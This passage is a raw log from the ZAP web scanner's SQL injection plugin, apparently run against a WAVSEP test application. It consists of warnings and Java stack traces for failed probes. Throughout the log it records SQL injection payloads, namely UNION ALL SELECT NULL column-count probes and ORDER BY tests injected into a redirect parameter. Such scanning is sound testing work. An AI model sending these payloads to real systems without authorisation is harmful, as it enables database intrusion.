org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681838 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 6201-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 6201-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681838 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681840 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681841 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681841 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681842 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681842 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681844 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681844 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681845 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681845 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681846 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7072-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7072-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681846 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 